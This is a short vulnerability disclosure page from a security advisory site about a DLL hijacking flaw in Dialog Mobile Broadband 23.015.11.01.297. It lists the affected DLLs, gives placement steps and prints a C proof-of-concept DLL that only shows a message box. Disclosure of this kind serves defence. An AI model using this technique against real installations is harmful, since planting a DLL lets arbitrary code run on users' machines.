Dialog Mobile Broadband 23.015.11.01.297 DLL Hijacking

2017.11.07
Credit: Himash N
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

Vulnerable software .......................... Dialog Mobile Broadband 23.015.11.01.297 Vulnerability type .............................. DLL hijacking vulnerability Affected DLL's.................................... CallSrvPlugin.dll , GpsSrvPlugin.dll , CallAppPlugin.dll , CallLogSrvPlugin.dll , WLANPlugin.dll , CallAppPlugin,MDInterface.dll Vendor url .https://www.dialog.lk Author..Himash Product descriptionDialog mobile broad band is a dongle software (3g modem)for accessing internet. It comes with dialog dongle pre installed. 1. Compile dynamic link library (DLL) 2. Rename to CallSrvPlugin.dll 2. Copy CallSrvPlugin to "C:\Program Files (x86)\Dialog Mobile Broadband" 3. Launch Dialog Mobile Broadband 4. MessageBox executes that verifies the dll hijacking is successful. Proof of concept Exploit #include <windows.h> int dll_hijack() { MessageBox(0, "found DLL hijacking vulnerability in dialog mobile broadband by himash", "DLL Message", MB_OK); return 0; } BOOL WINAPI DllMain ( HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) { dll_hijack(); return 0; }


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top